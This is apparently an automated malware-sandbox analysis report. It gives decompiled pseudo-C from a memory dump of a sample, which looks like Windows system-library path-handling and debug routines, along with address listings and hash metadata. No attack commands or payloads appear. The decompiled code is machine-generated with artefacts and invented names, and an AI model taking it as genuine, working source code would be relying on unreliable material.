														}
													}
												}
											}
											_t424 =  *((intOrPtr*)(_t346 + 4));
											_t361 = _t424 + (_t233 >> 1) * 2;
											_t396 = _t361;
											__eflags = _t396 - _t424;
											if(_t396 <= _t424) {
												L70:
												_t270 = _t361 - _t396 >> 0x00000001 & 0x0000ffff;
												__eflags = _t270;
												if(_t270 != 0) {
													_t362 =  *(_t361 - 2) & 0x0000ffff;
													__eflags = _t362 - 0x5c;
													if(_t362 != 0x5c) {
														__eflags = _t362 - 0x2f;
														if(_t362 != 0x2f) {
															_t270 = _t270 + 1;
															__eflags = _t270;
														}
													}
												}
												_t271 = _t270 & 0x0000ffff;
												__eflags = _t271 - _v740;
												if(_t271 <= _v740) {
													_t271 = _v740;
												}
												_t346 = _v744;
												_t272 = _t271 + _t271;
												__eflags = _t272;
												_t422 = _v704;
												_v740 = _t272;
												goto L77;
											} else {
												_t273 = _t396 - 2;
												_t412 = _t361;
												goto L67;
												L67:
												__eflags =  *_t273 - 0x3b;
												if( *_t273 == 0x3b) {
													_t367 = _t412 - _t396 + 0x00000002 >> 0x00000001 & 0x0000ffff;
													_v752 = _t367;
													_t369 = _t367 - 0x00000001 & 0x0000ffff;
													__eflags = _t369;
													if(_t369 != 0) {
														_t337 =  *(_t412 - 2) & 0x0000ffff;
														__eflags = _t337 - 0x5c;
														if(_t337 != 0x5c) {
															__eflags = _t337 - 0x2f;
															if(_t337 != 0x2f) {
																_t369 = _v752 & 0x0000ffff;
															}
														}
													}
													_t370 = _t369 & 0x0000ffff;
													__eflags = _t370 - _v740;
													if(_t370 > _v740) {
														_v740 = _t370;
													}
													_t412 = _t273;
												}
												_t396 = _t396 - 2;
												_t273 = _t273 - 2;
												__eflags = _t396 - _t424;
												if(_t396 > _t424) {
													goto L67;
												} else {
													_v752 = _t412;
													_t410 = _v712;
													_t361 = _v752;
													goto L70;
												}
											}
										}
										_t274 =  *_t410 & 0x0000ffff;
										_v732 =  *_t418 & 0x0000ffff;
										__eflags = _t274;
										if(_t274 == 0) {
											goto L64;
										}
										_t398 =  *(_t410 + 4);
										_t276 =  &(_t398[_t274 >> 1]);
										__eflags = _t276 - _t398;
										if(_t276 > _t398) {
											while(1) {
												_t372 =  *(_t276 - 2) & 0x0000ffff;
												_t276 = _t276 - 2;
												__eflags = _t372 - 0x2e;
												if(_t372 == 0x2e) {
													_v756 = 0;
													_v732 = 0;
													goto L64;
												}
												__eflags = _t372 - 0x5c;
												if(_t372 == 0x5c) {
													goto L64;
												}
												__eflags = _t372 - 0x2f;
												if(_t372 == 0x2f) {
													goto L64;
												}
												__eflags = _t276 - _t398;
												if(_t276 > _t398) {
													continue;
												} else {
													goto L64;
												}
											}
										}
										goto L64;
									}
									L23:
									_t389 = _t410;
									if(L328A58B0(2, _t410, 0,  &_v704, 0, 0,  &_v692) < 0) {
										L31:
										if(_t418 == 0) {
											goto L44;
										}
										_t280 =  *_t418 & 0x0000ffff;
										if(_t280 == 0) {
											goto L44;
										}
										_t389 = _t280;
										if((_a4 & 0x00000004) == 0) {
											_t281 =  *_t410 & 0x0000ffff;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L34;
											}
											_t339 =  *(_t410 + 4);
											_t313 =  &(_t339[_t281 >> 1]);
											__eflags = _t313 - _t339;
											if(_t313 <= _t339) {
												goto L34;
											} else {
												goto L142;
											}
											while(1) {
												L142:
												_t386 =  *(_t313 - 2) & 0x0000ffff;
												_t313 = _t313 - 2;
												__eflags = _t386 - 0x5c;
												if(_t386 == 0x5c) {
													goto L34;
												}
												__eflags = _t386 - 0x2f;
												if(_t386 == 0x2f) {
													goto L34;
												}
												__eflags = _t386 - 0x2e;
												if(_t386 == 0x2e) {
													goto L44;
												}
												__eflags = _t313 - _t339;
												if(_t313 > _t339) {
													continue;
												}
												goto L34;
											}
										}
										L34:
										_t376 = ( *_t410 & 0x0000ffff) + 2 + _t389;
										if(_t376 > 0xfffe) {
											_t421 = 0xc0000106;
											goto L45;
										}
										if(_t376 > ( *(_t429 + 0x12) & 0x0000ffff)) {
											 *((short*)(_t429 + 0x16)) = _t376 & 0x0000ffff;
											_t377 = L328A5D60(_t376 & 0x0000ffff);
											_v764 = _t377;
											__eflags = _t377;
											if(_t377 != 0) {
												goto L37;
											}
											goto L149;
										} else {
											_t377 = _v760;
											L37:
											E328D88C0(_t377,  *(_t410 + 4),  *_t410 & 0x0000ffff);
											E328D88C0(_v760 + (( *_t410 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t418 + 4)),  *_t418 & 0x0000ffff);
											_t429 = _t429 + 0x18;
											 *((short*)(_v760 + (( *_t418 & 0x0000ffff) + ( *_t410 & 0x0000ffff) >> 1) * 2)) = 0;
											_v764 =  *_t418 +  *_t410;
											_t389 =  &_v764;
											if(L328A58B0(2,  &_v764, 0,  &_v712, 0, 0,  &_v676) < 0) {
												goto L44;
											}
											_t299 = _v676;
											_t413 = _v708;
											if(_t299 != 0) {
												_v712 = _t299;
												_v708 = _v672;
												_t301 = _v668;
											} else {
												_t301 = 0;
											}
											_v632 = _t301;
											 *((intOrPtr*)(_t429 + 0x98)) =  &_v712;
											_push(_t429 + 0xd0);
											 *(_t429 + 0x94) = 0x18;
											_push(_t429 + 0x94);
											 *((intOrPtr*)(_t429 + 0xa4)) = 0x40;
											 *(_t429 + 0xa8) = 0;
											_v616 = 0;
											_t305 = L328D2D80();
											_t338 = _v672;
											_t425 = _t305;
											if(_t338 != 0) {
												__eflags = 0xffffffffffffffff;
												asm("lock xadd [ebx], ecx");
												if(0xffffffffffffffff == 0) {
													_push( *((intOrPtr*)(_t338 + 4)));
													E328D2A80();
													E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t338);
												}
											}
											E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t413);
											if(_t425 >= 0 || _t425 == 0xc0000043 || _t425 == 0xc0000022) {
												_push(_v736);
												_push( &_v724);
												_push(0);
												_push(_v720);
												_push(_v716);
												_push(_v748);
												goto L106;
											} else {
												goto L44;
											}
										}
									}
									_v744 = _v700;
									_t315 = _v692;
									if(_t315 != 0) {
										_v704 = _t315;
										_v700 =  *(_t429 + 0x5c);
										_t317 =  *((intOrPtr*)(_t429 + 0x60));
									} else {
										_t317 = 0;
									}
									 *((intOrPtr*)(_t429 + 0x7c)) = _t317;
									 *((intOrPtr*)(_t429 + 0x80)) =  &_v704;
									_push(_t429 + 0xa8);
									_v660 = 0x18;
									_push( &_v660);
									 *((intOrPtr*)(_t429 + 0x8c)) = 0x40;
									 *(_t429 + 0x90) = 0;
									 *(_t429 + 0x94) = 0;
									_t426 = L328D2D80();
									_t322 =  *((intOrPtr*)(_t429 + 0x64));
									if(_t322 != 0) {
										__eflags = 0xffffffffffffffff;
										asm("lock xadd [eax], ecx");
										if(0xffffffffffffffff == 0) {
											_push( *((intOrPtr*)(_t322 + 4)));
											E328D2A80();
											E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t429 + 0x64)));
										}
									}
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v744);
									if(_t426 >= 0 || _t426 == 0xc0000043 || _t426 == 0xc0000022) {
										_t421 = E328A9690(_t410, _v728, _t332, _v716, _v720, 0,  &_v724, _v736);
										__eflags = _t421;
										if(_t421 < 0) {
											goto L45;
										}
										goto L50;
									} else {
										_t418 = _v756;
										goto L31;
									}
								}
								if(_t389 == 5) {
									__eflags = _t343 - 4;
									if(_t343 < 4) {
										goto L53;
									}
									__eflags =  *_t226 - 0x2e;
									if( *_t226 == 0x2e) {
										_t389 = _t226[1] & 0x0000ffff;
										__eflags = _t389 - 0x5c;
										if(_t389 == 0x5c) {
											L134:
											_v724 = 0;
											goto L23;
										}
										__eflags = _t389 - 0x2f;
										if(_t389 == 0x2f) {
											goto L134;
										}
										__eflags = _t389 - 0x2e;
										if(_t389 != 0x2e) {
											goto L53;
										}
										__eflags = _t343 - 6;
										if(_t343 < 6) {
											goto L53;
										}
										_t330 = _t226[2] & 0x0000ffff;
										__eflags = _t330 - 0x5c;
										if(_t330 == 0x5c) {
											goto L134;
										}
										__eflags = _t330 - 0x2f;
										if(_t330 != 0x2f) {
											goto L53;
										}
										goto L134;
									}
									goto L53;
								}
								goto L23;
							}
							_t400 = _t226[2] & 0x0000ffff;
							if(_t400 != 0x5c) {
								__eflags = _t400 - 0x2f;
								if(_t400 == 0x2f) {
									goto L20;
								}
								goto L127;
							}
							L20:
							_t389 = 2;
						}
						goto L21;
					}
					_t401 =  *_t226 & 0x0000ffff;
					if(_t401 == 0x5c || _t401 == 0x2f) {
						__eflags = _t343 - 4;
						if(_t343 < 4) {
							L125:
							_t389 = 4;
							goto L21;
						}
						_t402 = _t226[1] & 0x0000ffff;
						__eflags = _t402 - 0x5c;
						if(_t402 == 0x5c) {
							L116:
							__eflags = _t343 - 6;
							if(_t343 < 6) {
								L124:
								_t389 = 1;
								goto L21;
							}
							_t403 = _t226[2] & 0x0000ffff;
							__eflags = _t403 - 0x2e;
							if(_t403 == 0x2e) {
								L119:
								__eflags = _t343 - 8;
								if(_t343 < 8) {
									L123:
									__eflags = _t343 - 6;
									_t389 = ((0 | _t343 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
									goto L21;
								}
								_t408 = _t226[3] & 0x0000ffff;
								__eflags = _t408 - 0x5c;
								if(_t408 == 0x5c) {
									L122:
									_t389 = 6;
									goto L21;
								}
								__eflags = _t408 - 0x2f;
								if(_t408 != 0x2f) {
									goto L123;
								}
								goto L122;
							}
							__eflags = _t403 - 0x3f;
							if(_t403 != 0x3f) {
								goto L124;
							}
							goto L119;
						}
						__eflags = _t402 - 0x2f;
						if(_t402 != 0x2f) {
							goto L125;
						}
						goto L116;
					} else {
						goto L15;
					}
				}
			}

0x328a51c8
0x328a51d5
0x328a51e2
0x328a51e5
0x328a51e8
0x328a51ee
0x328a51f5
0x328a51f9
0x328a51fc
0x328a5207
0x328a520b
0x328a520f
0x328a5213
0x328a5217
0x328a521f
0x328a5227
0x328a522f
0x328a5233
0x328a5236
0x328a523c
0x328a523e
0x328a523e
0x328a5249
0x328a524d
0x328a5843
0x328a5849
0x328a5849
0x328a5255
0x328a5852
0x328a5852
0x328a525d
0x328a525f
0x328a5261
0x328a5263
0x328a5263
0x328a526d
0x328f6c97
0x00000000
0x328a5296
0x328a5296
0x328a5299
0x328a529f
0x328a52b6
0x328a52b9
0x328a5801
0x328a52d4
0x328a52d7
0x328f6a9c
0x328f6a9c
0x328a52ef
0x328a52f3
0x328a52f7
0x328f6ae5
0x328f6ae8
0x328a5595
0x328a5595
0x328a5599
0x328a5865
0x328a5882
0x328a5884
0x328a5886
0x328f6c0a
0x328f6c0e
0x328f6c10
0x328f6c1a
0x328f6c1a
0x328a5582
0x328a5582
0x328a552d
0x328a552d
0x328a5533
0x328f6c8d
0x328f6c8d
0x328a5544
0x328a5546
0x328a554d
0x328a554e
0x328a554f
0x328a555a
0x328a555a
0x328a588c
0x328a5892
0x00000000
0x00000000
0x328a5898
0x328a5898
0x328a559f
0x328a55a1
0x328a55ec
0x328a55ec
0x328a55f0
0x328a55f3
0x328a55f5
0x328a55f9
0x328a55fc
0x328a5669
0x328a5671
0x328a567c
0x328a5680
0x328a5682
0x328a5686
0x328a568a
0x328a568f
0x328f6c21
0x00000000
0x328f6c21
0x328a5695
0x328a569d
0x328a56a1
0x328a56a4
0x328a56a8
0x328a56aa
0x328a5528
0x328a5528
0x00000000
0x00000000
0x00000000
0x00000000
0x328a56b0
0x328a56b0
0x328a56b0
0x328a56b2
0x328a56b4
0x00000000
0x00000000
0x00000000
0x00000000
0x328a56b6
0x328a56b6
0x328a56b6
0x328a56ba
0x00000000
0x00000000
0x328a56bc
0x328a56bf
0x328a56c1
0x00000000
0x00000000
0x00000000
0x328a56c1
0x328a56c3
0x328a56ca
0x328a56d0
0x328a56d4
0x328a56d8
0x328a56db
0x328a56dd
0x328a56e1
0x328a56e4
0x328a56e6
0x328a56e9
0x328a56eb
0x328a56eb
0x328a56ee
0x328a56ee
0x328a56e9
0x328a56e4
0x328a56fa
0x328a5704
0x328a5706
0x328f6c32
0x328f6c36
0x00000000
0x00000000
0x328f6c38
0x328f6c3e
0x00000000
0x00000000
0x328f6c48
0x328f6c4d
0x328f6c52
0x328f6c56
0x328f6c58
0x328f6ba3
0x328f6ba3
0x00000000
0x328f6ba3
0x00000000
0x328a570c
0x328a570c
0x328a5716
0x328a5723
0x328a5728
0x328a572c
0x328a572f
0x328a5731
0x328a5736
0x328a5748
0x328a574c
0x328a574c
0x328a574c
0x328a574c
0x328a5736
0x328a5758
0x328a575d
0x328a5761
0x328a5763
0x328f6c69
0x328f6c69
0x328a5769
0x328a5776
0x328a5778
0x328f6c7e
0x328f6c7e
0x00000000
0x328a577e
0x328a5786
0x328a578a
0x328a5790
0x328a5795
0x328a5797
0x328a580b
0x328a5817
0x328a5818
0x328a581a
0x328a581e
0x328a581f
0x328a5820
0x328a5820
0x328a5828
0x328a582e
0x328a5830
0x328a5832
0x328a5838
0x328a5838
0x00000000
0x328a5832
0x328a5799
0x328a579d
0x328a579f
0x328f6c73
0x328f6c75
0x328a57a5
0x328a57a5
0x328a57a5
0x328a57a8
0x328a57a8
0x328a57ac
0x328a57ae
0x00000000
0x328a57b4
0x328a57b4
0x00000000
0x328a57b4
0x328a57ae
0x328a5778
0x328a5706
0x328a56b0
0x328a55fe
0x328a5603
0x328a5606
0x328a5608
0x328a560a
0x328a5631
0x328a5637
0x328a563a
0x328a563d
0x328a563f
0x328a5643
0x328a5646
0x328a5648
0x328a564b
0x328a564d
0x328a564d
0x328a564d
0x328a564b
0x328a5646
0x328a564e
0x328a5651
0x328a5655
0x328a5657
0x328a5657
0x328a565b
0x328a565f
0x328a565f
0x328a5661
0x328a5665
0x00000000
0x328a560c
0x328a560c
0x328a560f
0x328a560f
0x328a5611
0x328a5611
0x328a5615
0x328a57c6
0x328a57c9
0x328a57ce
0x328a57d1
0x328a57d4
0x328a57d6
0x328a57da
0x328a57dd
0x328a57df
0x328a57e2
0x328a57e8
0x328a57e8
0x328a57e2
0x328a57dd
0x328a57eb
0x328a57ee
0x328a57f2
0x328a57fb
0x328a57fb
0x328a57f4
0x328a57f4
0x328a561b
0x328a561e
0x328a5621
0x328a5623
0x00000000
0x328a5625
0x328a5625
0x328a5629
0x328a562d
0x00000000
0x328a562d
0x328a5623
0x328a560a
0x328a55a3
0x328a55a9
0x328a55ad
0x328a55b0
0x00000000
0x00000000
0x328a55b2
0x328a55b7
0x328a55ba
0x328a55bc
0x328a55c0
0x328a55c0
0x328a55c4
0x328a55c7
0x328a55ca
0x328a55dc
0x328a55e4
0x328a55e4
0x328a55e4
0x328a55cc
0x328a55cf
0x00000000
0x00000000
0x328a55d1
0x328a55d4
0x00000000
0x00000000
0x328a55d6
0x328a55d8
0x00000000
0x328a55da
0x00000000
0x328a55da
0x328a55d8
0x328a55c0
0x00000000
0x328a55bc
0x328a5306
0x328a530a
0x328a5324
0x328a53d1
0x328a53d3
0x00000000
0x00000000
0x328a53d9
0x328a53df
0x00000000
0x00000000
0x328a53e9
0x328a53eb
0x328f6b36
0x328f6b39
0x328f6b3c
0x00000000
0x00000000
0x328f6b42
0x328f6b47
0x328f6b4a
0x328f6b4c
0x00000000
0x00000000
0x00000000
0x00000000
0x328f6b52
0x328f6b52
0x328f6b52
0x328f6b56
0x328f6b59
0x328f6b5c
0x00000000
0x00000000
0x328f6b62
0x328f6b65
0x00000000
0x00000000
0x328f6b6b
0x328f6b6e
0x00000000
0x00000000
0x328f6b74
0x328f6b76
0x00000000
0x00000000
0x00000000
0x328f6b78
0x328f6b52
0x328a53f1
0x328a53f9
0x328a5401
0x328f6b7d
0x00000000
0x328f6b7d
0x328a540e
0x328f6b8b
0x328f6b95
0x328f6b97
0x328f6b9b
0x328f6b9d
0x00000000
0x00000000
0x00000000
0x328a5414
0x328a5414
0x328a5418
0x328a5420
0x328a5439
0x328a5446
0x328a5451
0x328a5460
0x328a5472
0x328a547d
0x00000000
0x00000000
0x328a5483
0x328a5487
0x328a548e
0x328f6bad
0x328f6bb5
0x328f6bb9
0x328a5494
0x328a5494
0x328a5494
0x328a5496
0x328a54a1
0x328a54af
0x328a54b7
0x328a54c2
0x328a54c3
0x328a54ce
0x328a54d9
0x328a54e4
0x328a54e9
0x328a54ed
0x328a54f1
0x328f6bc2
0x328f6bc5
0x328f6bc9
0x328f6bcf
0x328f6bd2
0x328f6be3
0x328f6be3
0x328f6bc9
0x328a5503
0x328a550a
0x328f6bed
0x328f6bf9
0x328f6bfa
0x328f6bfc
0x328f6c00
0x328f6c01
0x00000000
0x00000000
0x00000000
0x00000000
0x328a550a
0x328a540e
0x328a532e
0x328a5332
0x328a5339
0x328f6af3
0x328f6afb
0x328f6aff
0x328a533f
0x328a533f
0x328a533f
0x328a5341
0x328a5349
0x328a5357
0x328a535c
0x328a5364
0x328a5365
0x328a5370
0x328a537b
0x328a538b
0x328a538d
0x328a5393
0x328f6b08
0x328f6b0b
0x328f6b0f
0x328f6b15
0x328f6b18
0x328f6b2c
0x328f6b2c
0x328f6b0f
0x328a53a8
0x328a53af
0x328a557c
0x328a557e
0x328a5580
0x00000000
0x00000000
0x00000000
0x328a53cd
0x328a53cd
0x00000000
0x328a53cd
0x328a53af
0x328a5300
0x328a5586
0x328a5589
0x00000000
0x00000000
0x328a558b
0x328a558f
0x328f6aa6
0x328f6aaa
0x328f6aad
0x328f6ad8
0x328f6ad8
0x00000000
0x328f6ad8
0x328f6aaf
0x328f6ab2
0x00000000
0x00000000
0x328f6ab4
0x328f6ab7
0x00000000
0x00000000
0x328f6abd
0x328f6ac0
0x00000000
0x00000000
0x328f6ac6
0x328f6aca
0x328f6acd
0x00000000
0x00000000
0x328f6acf
0x328f6ad2
0x00000000
0x00000000
0x00000000
0x328f6ad2
0x00000000
0x328a558f
0x00000000
0x328a5300
0x328a52dd
0x328a52e4
0x328f6a93
0x328f6a96
0x00000000
0x00000000
0x00000000
0x328f6a96
0x328a52ea
0x328a52ea
0x328a52ea
0x00000000
0x328a52b9
0x328a52a1
0x328a52a7
0x328f6a2a
0x328f6a2d
0x328f6a89
0x328f6a89
0x00000000
0x328f6a89
0x328f6a2f
0x328f6a33
0x328f6a36
0x328f6a3d
0x328f6a3d
0x328f6a40
0x328f6a7f
0x328f6a7f
0x00000000
0x328f6a7f
0x328f6a42
0x328f6a46
0x328f6a49
0x328f6a50
0x328f6a50
0x328f6a53
0x328f6a6d
0x328f6a6f
0x328f6a79
0x00000000
0x328f6a79
0x328f6a55
0x328f6a59
0x328f6a5c
0x328f6a63
0x328f6a63
0x00000000
0x328f6a63
0x328f6a5e
0x328f6a61
0x00000000
0x00000000
0x00000000
0x328f6a61
0x328f6a4b
0x328f6a4e
0x00000000
0x00000000
0x00000000
0x328f6a4e
0x328f6a38
0x328f6a3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x328a52a7

Strings

@, xrefs: 328A5365
@, xrefs: 328A54C3

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 8ff70808d557ebd73f0e87bddb483d78a4b494fcbf36850e7bd0339041de08ac
Instruction ID: 34a8f9ea53b24a042ccb37eeaea53c61c5dcebf31d6a4b83b038ac76ef145d7c
Opcode Fuzzy Hash: 8ff70808d557ebd73f0e87bddb483d78a4b494fcbf36850e7bd0339041de08ac
Instruction Fuzzy Hash: D2329DBC9093119FD7248F18C4A072EB7F1AF88748F50491EF99997250EF79D984CB52

Uniqueness

Uniqueness Score: -1.00%

Function 32895622 Relevance: 3.1, APIs: 2, Instructions: 104
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E32895622(signed int __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ebx;
				void* _t32;
				void* _t33;
				intOrPtr* _t36;
				char* _t52;
				intOrPtr _t55;
				void* _t72;
				signed int _t78;

				_push(__ecx);
				_t72 = __edx;
				_t75 = __ecx;
				if(_a4 == 0x102) {
					_t32 = E32897072(__ecx, __edx, 0);
					if(_t32 != 0) {
						L3:
						_t33 = L328A3C40();
						_t52 = 0x7ffe0386;
						if(_t33 != 0) {
							_t36 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t36 = 0x7ffe0386;
						}
						if( *_t36 != 0) {
							L32964C59( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						L32896F4C( &_v8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						 *((intOrPtr*)(_t75 + 0x30)) =  *((intOrPtr*)(_t72 + 0x30));
						 *((intOrPtr*)(_t75 + 0x34)) =  *((intOrPtr*)(_t72 + 0x34));
						 *0x329891e0(_t75,  *((intOrPtr*)(_t72 + 0x34)), _t72, _a4);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x30))))();
						if(L328A3C40() != 0) {
							_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						}
						if( *_t52 != 0) {
							L32964CD2( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						_t32 = E32896ECF(_v8);
						L9:
						return _t32;
					}
					goto L9;
				}
				_t55 =  *((intOrPtr*)(__edx + 0x58));
				if(_t55 != 0) {
					if(E328B2120(_t55, __ecx, 0, _t55) >= 0) {
						 *(__ecx + 0x50) =  *(__ecx + 0x50) | 0x00000100;
						 *((intOrPtr*)(__ecx + 0x64)) = _t55;
						goto L2;
					}
					_t78 = __ecx | 0xffffffff;
					_t32 = E328BDB40(_t72 + 0x20, _t78, 0);
					asm("lock xadd [edi], esi");
					if(_t78 == 1) {
						 *0x329891e0(_t72);
						_t32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4))))))();
					}
					goto L9;
				}
				L2:
				E32897007(_t75, _t72);
				goto L3;
			}

0x32895627
0x32895632
0x32895634
0x32895636
0x328956c7
0x328956ce
0x32895650
0x32895650
0x32895655
0x3289565c
0x328f0642
0x32895662
0x32895662
0x32895662
0x32895668
0x328f065e
0x328f065e
0x3289567a
0x32895685
0x3289568c
0x32895698
0x3289569e
0x328956a7
0x328f0671
0x328f0671
0x328956b0
0x328f068e
0x328f068e
0x328956b9
0x328956be
0x328956c2
0x328956c2
0x00000000
0x328956d0
0x3289563c
0x32895641
0x328f05f9
0x328f062a
0x328f0631
0x00000000
0x328f0631
0x328f05fb
0x328f0605
0x328f060a
0x328f060f
0x328f061d
0x328f0623
0x328f0623
0x00000000
0x328f060f
0x32895647
0x3289564b
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 32895698
RtlDebugPrintTimes.NTDLL ref: 328F061D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: fc8221dd1d72291cafb9111fd75162489b189ac4e54bac0429ee685b3ae89a73
Instruction ID: feff70987c647e8c6e9db229c060f2e960c9d7834d040da3404dea7a63ffde08
Opcode Fuzzy Hash: fc8221dd1d72291cafb9111fd75162489b189ac4e54bac0429ee685b3ae89a73
Instruction Fuzzy Hash: 3431DE39206B16FFE7469F24C940BCAFBA9BF84754F000025E91587A52DBB8E821CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 3290E372 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E3290E372(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t101;
				void* _t106;
				intOrPtr _t108;
				signed int _t109;
				short* _t111;
				signed int _t113;
				intOrPtr _t120;
				signed int* _t122;
				void* _t124;
				signed short* _t126;
				void* _t127;
				void* _t129;

				_push("true");
				_push(0x3296cbc0);
				L328E7C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t127 - 0x80)) = __edx;
				_t122 =  *(_t127 + 0xc);
				 *(_t127 - 0x7c) = _t122;
				 *((char*)(_t127 - 0x65)) = 0;
				 *((intOrPtr*)(_t127 - 0x64)) = 0;
				 *((intOrPtr*)(_t127 - 0x6c)) = 0;
				 *((intOrPtr*)(_t127 - 4)) = 0;
				_t101 = __ecx;
				if(_t101 == 0) {
					 *(_t127 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E3289FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t127 - 0x65)) = 1;
					_t64 =  *(_t127 - 0x90);
					_t102 = _t64[2];
					_t65 =  *_t64 & 0x0000ffff;
					L20:
					_t66 = _t65 >> 1;
					L21:
					_t111 =  *((intOrPtr*)(_t127 - 0x80));
					if(_t111 == 0) {
						L27:
						 *_t122 = _t66 + 1;
						_t68 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t127 - 0x64)) = _t68;
						L29:
						 *((intOrPtr*)(_t127 - 4)) = 0xfffffffe;
						_t69 = E3290E588(0);
						 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0x10));
						return _t69;
					}
					if(_t66 >=  *((intOrPtr*)(_t127 + 8))) {
						if(_t111 != 0 &&  *((intOrPtr*)(_t127 + 8)) >= 1) {
							 *_t111 = 0;
						}
						goto L27;
					}
					 *_t122 = _t66;
					_t124 = _t66 + _t66;
					E328D88C0(_t111, _t102, _t124);
					 *((short*)(_t124 +  *((intOrPtr*)(_t127 - 0x80)))) = 0;
					_t68 = 0;
					goto L28;
				}
				_t106 = _t101 - 1;
				if(_t106 == 0) {
					_t126 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E328AAA60(1, _t126, 0x32861890, _t127 - 0x74);
					 *((intOrPtr*)(_t127 - 0x64)) = _t74;
					_t102 = _t126[2];
					if(_t74 < 0) {
						_t65 =  *_t126 & 0x0000ffff;
						_t122 =  *(_t127 - 0x7c);
						goto L20;
					}
					_t66 = (( *(_t127 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t122 =  *(_t127 - 0x7c);
					goto L21;
				}
				if(_t106 == 1) {
					_push("true");
					_pop(_t108);
					 *((intOrPtr*)(_t127 - 0x78)) = _t108;
					 *((intOrPtr*)(_t127 - 0x70)) = 0;
					_push(_t127 - 0x70);
					_push(0);
					_push(0);
					_push(_t108);
					_push(_t127 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t127 - 0x64)) = E328D3FC0();
					 *((intOrPtr*)(_t127 - 0x64)) = 0;
					_t120 = L328A5D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true",  *((intOrPtr*)(_t127 - 0x70)));
					 *((intOrPtr*)(_t127 - 0x6c)) = _t120;
					if(_t120 != 0) {
						_push(_t127 - 0x70);
						_push( *((intOrPtr*)(_t127 - 0x70)));
						_push(_t120);
						_push("true");
						_push(_t127 - 0x78);
						_push(0x6b);
						_t84 = E328D3FC0();
						 *((intOrPtr*)(_t127 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t113 = 0;
						_t109 = 0;
						while(1) {
							 *((intOrPtr*)(_t127 - 0x84)) = _t113;
							 *(_t127 - 0x88) = _t109;
							if(_t109 >= ( *(_t120 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t113 = _t113 + ( *(_t109 * 0x2c + _t120 + 0x21) & 0x000000ff);
							_t109 = _t109 + 1;
						}
						_t88 = E3290E048(_t109, _t127 - 0x3c, "true", _t127 - 0x8c, 0, 0, L"%u", _t113);
						_t129 = _t129 + 0x1c;
						 *((intOrPtr*)(_t127 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t102 = _t127 - 0x3c;
						_t66 =  *((intOrPtr*)(_t127 - 0x8c)) - _t127 - 0x3c >> 1;
						goto L21;
					}
					_t68 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push("true");
				_push(_t127 - 0x60);
				_push(0x5a);
				_t94 = E328D2D10();
				 *((intOrPtr*)(_t127 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t127 - 0x50)) == 1) {
					_t102 = L"Legacy";
					_push(6);
				} else {
					_t102 = L"UEFI";
					_push("true");
				}
				_pop(_t66);
				goto L21;
			}

0x3290e372
0x3290e377
0x3290e37c
0x3290e381
0x3290e384
0x3290e387
